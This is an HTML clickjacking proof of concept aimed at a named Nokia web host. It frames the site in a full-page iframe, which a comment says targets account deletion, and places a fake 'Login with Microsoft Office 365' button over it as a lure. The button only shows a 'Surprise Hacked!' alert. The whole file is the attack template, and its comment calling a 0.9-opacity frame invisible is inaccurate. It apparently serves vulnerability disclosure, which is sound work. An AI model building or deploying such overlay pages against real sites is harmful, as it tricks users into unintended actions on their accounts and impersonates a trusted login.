<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>NOKIA POC</title>
<style>
    iframe {
        position: absolute;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        opacity: 0.9; /* Makes the iframe invisible */
        z-index: 99;
    }

    button {
        z-index: 200;
        top:380px;
	left: 115px;
        position: relative;
	background-color:#007bff;
border: none;

    padding: 15px 30px;      /* Increase space inside the button */
    font-size: 20px;         /* Make the text larger */
    border-radius: 7px;      /* Optional: make it look nicer */
    cursor: pointer;         /* Optional: show pointer on hover */
color:white;
    }
    h1 {
        top: 300px;
        position: relative;

    }
</style>
</head>
<body>
<button onclick="alert('Surprise Hacked! - RivuDon')">Login with Microsoft Office 365</button>

<!-- Invisible iframe targeting the account deletion URL -->
<iframe id="target-frame" src="https://insight360cns.ext.net.nokia.com/#/" frameborder="0"></iframe>

<script>
    
    document.getElementById('target-frame').onload = function() {
        
        console.log('Iframe has loaded, ready for clickjacking.');
    };
</script>
</body>
</html>
